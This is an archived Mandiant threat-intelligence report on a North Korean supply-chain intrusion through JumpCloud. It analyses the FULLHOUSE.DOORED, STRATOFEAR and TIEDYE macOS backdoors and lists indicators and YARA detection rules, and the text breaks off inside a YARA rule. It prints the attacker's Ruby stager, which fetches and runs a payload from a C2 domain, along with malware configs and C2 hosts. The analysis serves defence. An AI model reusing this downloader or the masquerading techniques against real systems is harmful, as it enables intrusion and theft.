{ "id": "6aabeaf8-001a-414e-8eab-71ffed2ff964", "created_at": "2026-04-06T00:12:25.021744Z", "updated_at": "2026-04-10T03:38:19.317419Z", "deleted_at": null, "sha1_hash": "25d1e0f161e755fb43a986a32487aaeaf06aa589", "title": "North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 257379, "plain_text": "North Korea Leverages SaaS Provider in a Targeted Supply Chain\r\nAttack | Mandiant\r\nBy Mandiant\r\nPublished: 2023-07-24 · Archived: 2026-04-05 17:49:51 UTC\r\nWritten by: Austin Larsen, Dan Kelly, Joseph Pisano, Mark Golembiewski, Matt Williams, Paige Godvin\r\nIn July 2023, Mandiant Consulting responded to a supply chain compromise affecting a US-based software solutions entity.\r\nWe believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a\r\nzero-trust directory platform service used for identity and access management. JumpCloud reported this unauthorized access\r\nimpacted fewer than five customers and less than 10 devices.The details in this blog post are based on Mandiant’s\r\ninvestigation into the attack against one of JumpCloud’s impacted customers.\r\nMandiant attributed these intrusions to UNC4899, a Democratic People's Republic of Korea (DPRK)-nexus actor, with a\r\nhistory of targeting companies within the cryptocurrency vertical. Mandiant assesses with high confidence that UNC4899 is\r\na cryptocurrency-focused element within the DPRK's Reconnaissance General Bureau (RGB). Based on reporting from\r\ntrusted partners, UNC4899 likely corresponds to TraderTraitor, a financially motivated DPRK threat group that primarily\r\ntargets blockchain-related companies.\r\nSupply Chain Attack\r\nOn June 27, 2023, at 18:51:57 UTC, Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a\r\ndownstream customer (a software solutions entity). JumpCloud confirmed the commands framework was used for malicious\r\ndata injections in their security incident disclosure. The contents and functionalities of this script are outlined below in the\r\nBackdoor Payloads section. \r\nHost Artifacts\r\nEvidence of compromise was observed within the JumpCloud agent log located at the file\r\npath  /private/var/log/jcagent.log .\r\nMandiant observed log entries in jcagent.log that indicated a directive named “Runworkflow” triggered execution on the\r\nsystem:\r\ntime=2023-06-27 18:51:57.415615-07:00 PID=82291 level=warning msg=Fallback Poll was required to handle the following dire\r\ntime=2023-06-27 18:51:57.416036-07:00 PID=82291 level=info msg=policies manager received a request to update workflow poli\r\ntime=2023-06-27 18:51:57.416145-07:00 PID=82291 level=info msg=removeWorkflowPolicies - Removing isExecuteOnGUILogin workf\r\ntime=2023-06-27 18:51:57.416192-07:00 PID=82291 level=info msg=updateWorkflowPolicies - Adding all current workflow polici\r\ntime=2023-06-27 18:51:57.416238-07:00 PID=82291 level=info msg=Processing TypeScheduleCron\r\n \r\ntime=2023-06-27 18:51:57.416308-07:00 PID=82291 level=info msg=Policy manager creating schedule cron monitor ID=\u003cID\u003e name\r\ntime=2023-06-27 18:51:57.416550-07:00 PID=82291 level=info msg=policies manager received a request to apply Workflow polic\r\nDuring the investigation, Mandiant observed the threat actor target four (4) OSX Ventura systems running either versions\r\n13.3 or 13.4.1. During the forensic analysis of these systems, Mandiant identified a relatively new forensic artifact that\r\nproved extremely valuable to the investigation.\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 1 of 11\n\nThis forensic artifact is related to Apple’s XProtect services, specifically, the XProtect Behavioral Service. There are\r\ncurrently five behavioral-based rules defined by Apple. Information about executed programs that violate one or more of\r\nthese rules is recorded in the XProtect Database (XPdb), which is stored in SQLite 3 format and located at\r\n/var/protected/xprotect/XPdb . At this time, it does not appear that the XProtect Behavioral Service is configured to\r\nblock execution.\r\nThrough analysis of data stored in the XPdb, Mandiant identified entries containing specific signing identifiers that\r\ncorrelated to attacker payloads. Specifically, the exec_signing_id field within the XPdb contains information about the\r\nsignature of the binary, which can be used to help identify the author of a particular signed binary. Mandiant identified three\r\nunique signatures associated with malicious files: \r\nmac-555549440ea0d64e96bb34428e08cc8d948b40e7\r\np-macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7\r\nsecurityd-555549440fca1d2f1e613094b0c768d393f83d7f\r\nMandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or\r\notherwise unable to be identified through other forms of analysis.\r\nAn additional field of interest in the XPdb was the exec_cdhash, which contains the cdhash, or Code Directory hash, of the\r\nexecuted binaries. Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash\r\nvalues stored in the XPdb. Because the cdhash is computed based on executable code in the application, Mandiant was able\r\nto identify additional malware in the environment despite the files being deleted by the threat actor and the samples having\r\ndifferent file hashes.\r\nFurther fields of interest in the XPdb had the prefix “responsible_” and contained information about the parent of the\r\nprocess which violated the behavioral rules. On multiple systems, XPdb entries for the malware contained the parent process\r\nof the JumpCloud agent, further evidence that the threat actor leveraged JumpCloud to gain initial access to victim\r\nenvironments.\r\nThe threat actor was consistently observed removing prior payloads from disk; however, the FSEvents artifacts were able to\r\nprovide great insight into files that previously existed on disk. The FSEvents contained details on the creation, modification,\r\npermission changes, renaming, and removal of files, even if the filesystem no longer contained artifacts indicating the\r\nexistence of these files remained. Using the node_id field associated with individual entries, Mandiant was able to identify\r\nthe order of specific threat actor activities on systems and the updated names of renamed files.  \r\nThe following table provides an example of the relevant data obtained from FSEvents:\r\nnode_id fullpath Description\r\n53789510 /Library/Ruby/Gems/2.6.0/extensions/init.rb Ruby script\r\n53789519 /usr/local/bin/com.docker.vmnat FULLHOUSE.DOORED\r\n53789522 /usr/local/bin/com.docker.vmnat.lock Not recovered\r\n54101444 /Library/Fonts/ArialUnicode.ttf.md5 STRATOFEAR (Config)\r\n54102142 /Library/PrivilegedHelperTools/com.microsoft.teams.TeamsDaemon STRATOFEAR\r\n54102142 /Library/PrivilegedHelperTools/us.zoom.ZoomService STRATOFEAR\r\n54102303 /Library/LaunchDaemons/com.microsoft.teams.TeamsDaemon.plist STRATOFEAR (LaunchDaemon)\r\n54212385 /Library/LaunchDaemons/us.zoom.ZoomService.plist STRATOFEAR (LaunchDaemon)\r\nBackdoor Payloads\r\nInitial Access\r\nInitial access was gained by compromising JumpCloud and inserting malicious code into their commands framework. In at\r\nleast one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent. The script\r\ncontained instructions to download and execute a second stage payload. Within 24 hours of gaining initial access to systems\r\nin the victim environment, the threat actor deployed additional backdoors and established persistence via plists. The initial\r\npayloads and second stage backdoors were removed from the system. \r\nThe directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed\r\nsignificant priority into masquerading as legitimate files and applications. \r\nMandiant retrieved the lightweight Ruby script named init.rb that was deployed to multiple systems:\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 2 of 11\n\nrequire 'open-uri'\r\nffn = '/usr/local/bin/com.docker.vmnat'\r\nFile.open(ffn, 'wb') do |file|\r\nfile.write(open('hxxps://primerosauxiliosperu[.]com/lic.dat').read)\r\nend\r\nsleep(1)\r\nFile.chmod(0755, ffn)\r\nfn = '/usr/local/bin/com.docker.vmnat.lock'\r\nFile.open(fn, 'wb') do |file|\r\nfile.write(open('hxxps://primerosauxiliosperu[.]com/lic_bak.dat').read)\r\nend\r\nsleep(1)\r\nsystem(ffn)\r\nThe script downloads two files to locations defined by the variables ffn and fn, but only the first file is executed via the\r\nsystem function. The second file could not be identified on the hosts.\r\nFULLHOUSE.DOORED (com.docker.vmnat, npx-cli, us.zoom.ZoomUpdate)\r\nThe threat actor downloaded and executed /usr/local/bin/com.docker.vmnat using the aforementioned Ruby script.\r\nHowever, com.docker.vmnat was removed from the system. Fortunately, an artifact of its execution was discovered in the\r\n/private/var/db/oah directory. \r\nBecause com.docker.vmnat was likely compiled for x86-64 systems, the code had to be translated to ARM64 to successfully\r\nexecute on the target system. As a result, Apple’s Rosetta 2 translator produced a com.docker.vmnat.aot file under the oah\r\ndirectory that included the translated ARM64 code as well as symbols present in the original com.docker.vmnat\r\napplication. Based on these symbols, Mandiant assesses with moderate confidence that com.docker.vmnat was a version of\r\nthe FULLHOUSE.DOORED backdoor. \r\nFULLHOUSE.DOORED is a backdoor written in C/C++ that communicates using HTTP. It incorporates the capabilities of\r\nthe FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution, file transfer,\r\nfile management, and process injection. The command and control (C2) server must be configured from either the command\r\nline or a configuration file.\r\nAdditional attacker backdoors identified on systems with names that masquaraded as legitimate binaries and also produced\r\nAOT files upon translation (e.g., npx-cli and npx-cli.aot ).\r\nSTRATOFEAR (com.google.kservice, us.zoom.ZoomService)\r\nLimited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim\r\nenvironment; however, in each instance, STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED. On\r\nthe systems analyzed, only one backdoor remained on the system, indicating the threat actor may have used\r\nFULLHOUSE.DOORED as a first-stage backdoor before deploying STRATOFEAR as a second-stage backdoor.\r\nSTRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration,\r\nwhich is decrypted from a local file. The backdoor’s primary functionality involves retrieving and executing additional\r\nmodules. Modules may be downloaded from a remote server or loaded from disk. \r\nSTRATOFEAR contains an embedded configuration that includes two file paths. The first path\r\n( /Library/Fonts/ArialUnicode.ttf.md5 ) stores the backdoor’s full configuration, including its C2 servers. The second\r\npath ( /Library/Fonts/ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that\r\nis described as follows.\r\nA portion of STRATOFEAR’s 0x1052-byte decrypted configuration is shown as follows.\r\n00000410 25 63 01 00 00 00 E8 03 00 00 03 00 00 00 02 00 %c....è.........\r\n00000420 00 00 65 6D 62 65 64 3A 2F 2F 30 00 00 00 00 00 ..embed://0.....\r\n00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 3 of 11\n\n000004F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000520 00 00 00 00 00 00 70 73 73 6C 3A 2F 2F 63 6F 6E ......pssl://con\r\n00000530 74 6F 72 74 6F 6E 73 65 74 2E 63 6F 6D 3A 34 34 tortonset.com:44\r\n00000540 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3...............\r\n00000550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000620 00 00 00 00 00 00 00 00 00 00 70 73 73 6C 3A 2F ..........pssl:/\r\n00000630 2F 72 65 6C 79 73 75 64 64 65 6E 2E 63 6F 6D 3A /relysudden.com:\r\n00000640 34 34 33 00 00 00 00 00 00 00 00 00 00 00 00 00 443.............\r\nSTRATOFEAR refers to the four-byte value at offset 0x410 ( 0x16325 ) as a uid. The four-byte value at offset 0x416\r\n( 0x3e8 or decimal 1000 ) is the backdoor’s version number. STRATOFEAR’s configuration file may include AES-128-\r\nencrypted modules; however, this was not the case in the discovered sample.\r\nA subset of commands supported by STRATOFEAR are listed in the following table:\r\nCommand ID Description\r\n0x02 Start the primary module thread (see the following module command table)\r\n0x07 Collect system information, module information, and configuration data\r\n0x08 Read and decrypt the local configuration file\r\n0x09 Write the in-memory configuration to the local configuration file\r\n0x0A Delete the local configuration file\r\n0x0B Get the path of the local configuration file\r\n0x0C Retrieve the in-memory configuration\r\nSystem information collected using command 0x07 includes the system name, current username, and the system’s\r\narchitecture.\r\nSTRATOFEAR supports the module-related commands listed in the following table:\r\nCommand ID Description\r\n0x60 Not implemented\r\n0x61 Retrieve module information: name, ID, version, memory address\r\n0x62 Load module from memory or disk and execute its Initialize function\r\n0x63 Invoke module by ID\r\n0x64 Retrieve module execution result\r\n0x65 Retrieve module start and end values\r\n0x66 Change directory\r\nDownloaded modules may be written to a .tmp file in the $TMPDIR or /tmp directory. The file’s name consists of six\r\nrandomly-generated alphanumeric characters.\r\nSTRATOFEAR’s code references five predefined module types that have an ID value and an internal name:\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 4 of 11\n\nModule ID Internal Name\r\n1 module_ipc\r\n2 module_monitor\r\n3 module_apu\r\n4 module_event\r\n5 module_net\r\nSTRATOFEAR also contains strings that are used to report a module’s location. Possible locations are  “ Config ”,\r\n“ Static ”, or “ Path ” followed by a file path.\r\nSTRATOFEAR  employs what it refers to as “monitors” to monitor system activity using up to 16 threads. The backdoor\r\nreferences eight different monitors and includes descriptions for all but one ( 0x45 ).\r\nMonitor\r\nID\r\nInternal Description\r\n0x42 \"monitor for when file(%s) is created\"\r\n0x43 \"monitor for when size of file(%s) is changed\"\r\n0x44 \"monitor for when status of network connection(%s:%d =\u003e %s:%d) is created\"\r\n0x45\r\nNone. This monitor can test for a successful TCP connection to a given IP address or domain using a\r\nspecified port.\r\n0x46 \"monitor for when process(%s) is created\"\r\n0x47 \"monitor for when new device is mounted\"\r\n0x48 \"monitor for when new session is activated\"\r\n0x49 \"monitor for when it is waked up after %d minutes\"\r\nMandiant directly observed one (1) variant of STRATOFEAR as a Mach-O executable compiled for ARM64 systems that\r\ncontained a self-signed certificate with a particular Common Name (CN). Mandiant identified a second sample on\r\nVirusTotal with the same self-signed certificate CN. The second sample is a Windows DLL protected using VMProtect that\r\nwas first submitted to VirusTotal on October 19, 2022. Mandiant assesses with moderate confidence that the DLL is a\r\nWindows version of STRATOFEAR.\r\nTIEDYE (xpc.protect)\r\nLimited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment;\r\nhowever, like STRATOFEAR, TIEDYE was likely deployed as a second-stage backdoor by FULLHOUSE.DOORED. \r\nA Mach-O executable named xpc.protect was identified and determined to be an evolution of the TIEDYE backdoor.\r\nTIEDYE can communicate with a C2 server using a range of supported protocols described as follows. Its capabilities\r\ninclude retrieving and executing additional payloads, collecting basic system information, and executing shell commands.\r\nA portion of TIEDYE’s raw configuration is shown as follows:\r\n00000000 00 00 01 E3 00 0E 00 1E 00 00 00 04 00 03 00 20 ...ã...........\r\n00000010 00 10 56 E6 00 00 00 04 00 03 00 21 00 00 00 05 ..Væ.......!....\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 5 of 11\n\n00000020 00 00 00 7D 00 0D 00 33 00 00 00 37 00 0E 00 00 ...}...3...7....\r\n00000030 00 00 00 17 00 0C 00 34 73 73 6C 3A 2F 2F 62 61 .......4ssl://ba\r\n00000040 73 6B 65 74 73 61 6C 75 74 65 2E 63 6F 6D 00 00 sketsalute.com..\r\n00000050 00 00 04 00 03 00 35 00 00 00 00 00 00 00 04 00 ......5.........\r\n00000060 03 00 36 00 00 00 00 00 00 00 36 00 0E 00 00 00 ..6.......6.....\r\n00000070 00 00 16 00 0C 00 34 73 73 6C 3A 2F 2F 72 65 6E ......4ssl://ren\r\n00000080 74 65 64 70 75 73 68 79 2E 63 6F 6D 00 00 00 00 tedpushy.com....\r\n00000090 04 00 03 00 35 00 00 00 00 00 00 00 04 00 03 00 ....5...........\r\n000000A0 36 00 00 00 00 00 00 00 04 00 03 00 23 00 00 00 6...........#...\r\n000000B0 0A 00 00 01 08 00 0D 00 24 00 00 00 24 00 0E 00 ........$...$...\r\n000000C0 00 00 00 00 04 00 03 00 25 00 00 03 E8 00 00 00 ........%...è...\r\n000000D0 04 00 03 00 26 00 00 00 00 00 00 00 04 00 03 00 ....\u0026...........\r\n000000E0 27 00 00 00 00 00 00 00 24 00 0E 00 00 00 00 00 '.......$.......\r\n000000F0 04 00 03 00 25 00 00 03 E9 00 00 00 04 00 03 00 ....%...é.......\r\n00000100 26 00 00 00 00 00 00 00 04 00 03 00 27 00 00 00 \u0026...........'...\r\n00000110 00 00 00 00 24 00 0E 00 00 00 00 00 04 00 03 00 ....$...........\r\n00000120 25 00 00 03 EA 00 00 00 04 00 03 00 26 00 00 00 %...ê.......\u0026...\r\n00000130 00 00 00 00 04 00 03 00 27 00 00 00 00 00 00 00 ........'.......\r\n00000140 24 00 0E 00 00 00 00 00 04 00 03 00 25 00 00 03 $...........%...\r\n00000150 ED 00 00 00 04 00 03 00 26 00 00 00 00 00 00 00 í.......\u0026.......\r\n00000160 04 00 03 00 27 00 00 00 00 00 00 00 24 00 0E 00 ....'.......$...\r\n00000170 00 00 00 00 04 00 03 00 25 00 00 00 00 00 00 00 ........%.......\r\n00000180 04 00 03 00 26 00 00 00 00 00 00 00 04 00 03 00 ....\u0026...........\r\n00000190 27 00 00 00 00 00 00 00 24 00 0E 00 00 00 00 00 '.......$.......\r\n000001A0 04 00 03 00 25 00 00 00 00 00 00 00 04 00 03 00 ....%...........\r\n000001B0 26 00 00 00 00 00 00 00 04 00 03 00 27 00 00 00 \u0026...........'...\r\n000001C0 00 00 00 00 22 00 0C 00 37 2F 4C 69 62 72 61 72 ....\"...7/Librar\r\n000001D0 79 2F 43 61 63 68 65 73 2F 63 6F 6D 2E 61 70 70 y/Caches/com.app\r\n000001E0 6C 65 2E 70 72 69 76 61 63 79 00 05 05 05 05 05 le.privacy......\r\nThe configuration contains two C2 servers that are prefixed with a protocol identifier. TIEDYE supports the following\r\nprotocols:  tcp ,  tcp6 ,  udp ,  upd6 ,  http ,  https ,  proxy_socks4 ,  proxy_socks4a ,  pipe ,  ssl ,  ssl3 , and  rdp .\r\nThe file path at the end of the configuration is used to store configuration data that is encrypted using AES-128. \r\nPrevious versions of TIEDYE were configured to persist via a LaunchAgent. The current version contains the functionality\r\nto create a LaunchAgent at one of the following locations but is not configured to do so:\r\n$HOME/Library/LaunchAgents/com.studentd.agent.plist\r\n/Library/LaunchDaemons/com.studentd.agent.plist\r\nTIEDYE has similarities to RABBITHUNT, which is a backdoor written in C++ that communicates via a custom binary\r\nprotocol over TCP. RABBITHUNT's core functionality is implemented through modules downloaded directly into memory\r\nor read from a local file. Capabilities added via modules include reverse shell, file transfer, process creation, and process\r\ntermination.\r\nDPRK Cryptocurrency Targeting\r\nMandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal\r\nsecurity teams. \r\nUNC4899 targeting overlaps with a separate RGB-aligned group, APT43, who in July, 2023 displayed interest in the\r\ncryptocurrency vertical, specifically targeting a variety of C-Suite executives from multiple fintech and cryptocurrency\r\ncompanies in the United States, South Korea, Hong Kong, and Singapore. Many of the individuals work at organizations\r\nrelated to financial services, cryptocurrency, blockchain, web3 and related entities. The overlaps in targeting and sharing of\r\ninfrastructure amongst DPRK groups highlights the continued targeting and coordinated interest in the cryptocurrency field.\r\nOperational Security Fumble\r\nMandiant has observed RGB units utilize a series of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with\r\ncommercial VPN providers to obscure their source address. These relays seem to be heavily shared among units under the\r\nRGB umbrella.\r\nMandiant observed UNC4899 utilize various VPN providers as a final hop, the most common being ExpressVPN, but\r\nconnections to NordVPN, TorGuard and many other providers have also been observed. There have been many occasions in\r\nwhich DPRK threat actors did not employ this last hop, or mistakenly did not utilize this while conducting actions on\r\noperations on the victim's network.\r\nThe VPNs used by RGB actors occasionally fail, which reveals the IP addresses of the actor's true origins. Mandiant\r\nobserved the DPRK threat actor UNC4899 connecting directly to an attacker-controlled ORB from their 175.45.178[.]0/24\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 6 of 11\n\nsubnet. (Ryugyong Dong, Pyongyang). Additionally we observed the DPRK threat actor log directly into a Pyongyang IP,\r\nfrom one of their jump boxes. Our evidence supports that this was an OPSEC slip up since the connection to the North\r\nKorean netblock was short-lived. Figure 2 provides an overview of the network infrastructure used in this campaign.\r\nFigure 2: UNC4899 network infrastructure\r\nAdditionally, Mandiant was able to uncover additional infrastructure due to the fact that a PTR record was never changed\r\nfrom a previous operation. Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat\r\nactors. Additionally, the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still\r\nhaving a PTR record to the domain previously identified.\r\nAttribution\r\nMandiant is tracking this activity as UNC4899, a suspected North Korean actor. We assess with high confidence that\r\nUNC4899 is a cryptocurrency-focused group that falls under the RGB. UNC4899's targeting is selective, and they have been\r\nobserved gaining access to victim networks through JumpCloud. Mandiant has observed overlap amongst multiple North\r\nKorean groups that fall under the RGB. These groups commonly share infrastructure to complete their actions on objectives.\r\nMandiant has observed UNC2970, APT43, and UNC4899 all utilize similar infrastructure.\r\nMandiant has observed an increase in financially motivated operations by DPRK actors in the past year, particularly those\r\nfocused on the cryptocurrency industry. RGB-aligned crypto-focused groups, publicly reported under the umbrella term\r\nLazarus, and clear variants of historic, established APT threat actors such as the open source “TraderTraitor” and\r\n“AppleJeus”, have increasingly conducted financially motivated operations that have affected the cryptocurrency industry\r\nand various blockchain platforms. \r\nOutlook and Implications\r\nThe campaign targeting JumpCloud, and the previously reported DPRK supply chain compromise from earlier this year\r\nwhich affected the Trading Technologies X_TRADER application and 3CX Desktop App software, exemplifies the\r\ncascading effects of these operations to gain access to service providers in order to compromise downstream victims. Both\r\noperations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing\r\nsupply chain TTPs to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets.\r\nMandiant assesses DPRK cryptocurrency units will continue development of MacOS malware and capabilities to target\r\nhigh-value individuals within the cryptocurrency industry, and the software solutions they use. \r\nMandiant assesses that DPRK’s cyber landscape has evolved to a streamlined alignment with shared tooling and targeting\r\nefforts. Operators within these units quickly change their current focus and begin working on separate unrelated efforts such\r\nas ransomware, weapons and nuclear targeting, cryptocurrency efforts, etc. This seeming “streamlining” of activities by\r\nDPRK often makes it difficult for defenders to track, attribute, and thwart malicious activities, while enabling this now\r\ncollaborative adversary to move stealthily and with greater speed. The level of shared targeting and tooling leads Mandiant\r\nto believe that shifts are continuing to occur even outside of the heavily RGB dominated cyber landscape. \r\nAcknowledgements\r\nBeyond the listed authors are many Mandiant professionals whom we would like to thank for their continued effort and\r\ndedication in working with our clients to respond to DPRK related intrusions. We also want to specifically thank Google’s\r\nThreat Analysis Group (TAG), Mandiant’s DPRK Fusion Cell, and our government partners for their continued\r\ncollaboration and support. We would also like to thank Trellix for our continued partnership and for providing supporting\r\ndetection YARA rules and associated indicators.\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nIP Address ASN Netblock Location\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 7 of 11\n\n146.19.173.125 213373 IP Connect Inc Seychelles\r\n23.227.202.54 29802 HIVELOCITY, Inc. Tampa, FL, US\r\n38.132.124.88 9009 M247 Europe Secaucus, NJ, US\r\n88.119.174.148 61272 BaCloud Lithuania\r\n198.244.135.250 16276 OVH United Kingdom (GB)\r\nDomain\r\ncontortonset[.]com\r\nrelysudden[.]com\r\nprimerosauxiliosperu[.]com\r\nrentedpushy[.]com\r\nbasketsalute[.]com\r\nprontoposer[.]com\r\nEndpoint IOCs\r\nMD5 SHA256 Filename\r\n65baa3c1a22052fe1f70c9d2cbe11de4 a8b1c5eb2254e1a3cec397576ef42da038600b4fa7cd1ab66472d8012baabf17 init.rb\r\n155597a7985cb8f7a6e748e5e108f637 08607faad41009e31c094539b20b615b3e7a71e716f2bca12e4a097f38f14466 com.docker.vmnat.aot\r\nN/A 5701d7bcf809d5ffc9061daeb24d3e7cc6585d9b42bacf94fc68a6c500542f8c com.docker.vmnat\r\nN/A 5701d7bcf809d5ffc9061daeb24d3e7cc6585d9b42bacf94fc68a6c500542f8c Npx-cli\r\nN/A 28c3d359364bf5d64a864f08d4743ea08e48017be27fda8cf53fb5ba307583b4 us.Zoom.ZoomUpdate\r\n39a421ea89035ffcc3dea0cd0f10964e e901d9279d8f2ad96d741e7cd92770c0ce3ff3f4c029dbf26177b4e09228fe66 ArialUnicode.ttf.md5\r\nN/A N/A com.google.keystone.agent.p\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 8 of 11\n\nN/A N/A com.google.keystone.service\r\nN/A N/A com.microsoft.teams.TeamsD\r\n27db0f17282a4c4507266f3c4d9c4527 88f23c22a7f9da8b5087a3fa9c76fd5c79903d89ceda4152943cadc0797cbcb8 us.zoom.ZoomService.plist\r\n6d8194c003d0025fa92fbcbf2eadb6d1 a90561efc22bdd777956cc67d5b67e3ec3c1b4f35a64f4328e40615d2ab24186 com.google.kservice\r\n6d8194c003d0025fa92fbcbf2eadb6d1 a90561efc22bdd777956cc67d5b67e3ec3c1b4f35a64f4328e40615d2ab24186 com.microsoft.teams.TeamsD\r\n6d8194c003d0025fa92fbcbf2eadb6d1 a90561efc22bdd777956cc67d5b67e3ec3c1b4f35a64f4328e40615d2ab24186 us.zoom.ZoomService\r\n48eaf2a7e97189709fb3789f0c662e1c 5d18443f88f38ad7e3de62ac46489f649b4e8183b76fba902fb9a9ccf8a0d5c8 com.apple.privacy\r\nb0e0e0d258fcd55d3cc5af2b4669e014 9b1c1013ad8d2c0144af74eff5a2afc454b7b858bb7a5cba312bfb0f531c8930 com.xpc.agent.plist\r\n15bfe67e912f224faef9c7f6968279c6 6f1c47566a46d252885858f928a3b855fb3fd03941e3571d152562d0c75c4d47 xpc.protect\r\nN/A f0854a28209e07a70d7847af4b2632e697bcb95f2c8fcead41eb9314710bd0c2 xpc.protect\r\nXPdb IOCs\r\nFilename exec_signing_id exec_cdhash\r\nus.zoom.ZoomUpdate\r\nmac-555549440ea0d64e96bb34428e08cc8d948b40e7\r\ne5d42bee74a1e1813e8aad9a46a5ebc219953926\r\nnpx-cli\r\nmac-555549440ea0d64e96bb34428e08cc8d948b40e7\r\ne5d42bee74a1e1813e8aad9a46a5ebc219953926\r\ncom.docker.vmnat\r\nmac-555549440ea0d64e96bb34428e08cc8d948b40e7\r\ne5d42bee74a1e1813e8aad9a46a5ebc219953926\r\ncom.google.kservice\r\np-macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7\r\nff975b95cfc65b6d19ca18993322cfeed282de04\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 9 of 11\n\nxpc.protect\r\nsecurityd-555549440fca1d2f1e613094b0c768d393f83d7f\r\nc1fc3213bdb8f3139fd5d4b13e242441016c3c84\r\nDetection Rules\r\nYARA\r\nM_APT_Backdoor_STRATOFEAR_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects instances of STRATOFEAR\"\r\n md5 = \"6d8194c003d0025fa92fbcbf2eadb6d1\"\r\n platform = \"OSX, Win64\"\r\n malware_family = \"STRATOFEAR\"\r\n strings:\r\n $str1 = \"-alone\" ascii\r\n $str2 = \"-psn\" ascii\r\n $str3 = \"embed://\" ascii\r\n $str4 = \"proc_data\" ascii\r\n $str5 = \"udp://\" ascii\r\n $str6 = \"Path : %s\" ascii\r\n $str7 = \"127.0.0.1\" ascii\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0xCEFAE\r\n}\r\nM_APT_Backdoor_TIEDYE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects instances of TIEDYE\"\r\n md5 = \"15bfe67e912f224faef9c7f6968279c6\"\r\n platforms = \"OSX\"\r\n malware_family = \"TIEDYE\"\r\n strings:\r\n $str1 = \"%s/Library/LaunchAgents/com.%s.agent.plist\" ascii\r\n $str2 = \"/Library/LaunchDaemons/com.%s.agent.plist\" ascii\r\n $str3 = \"%s/.plugin%04d.so\" ascii\r\n $str4 = \"sw_vers -productVersion\" ascii\r\n $str5 = \"!proxy=http://\" ascii\r\n $str6 = \"Content-Type: application/octet-stream\" ascii\r\n $str7 = \"\u003ckey\u003eRunAtLoad\u003c/key\u003e\" ascii\r\n $str8 = 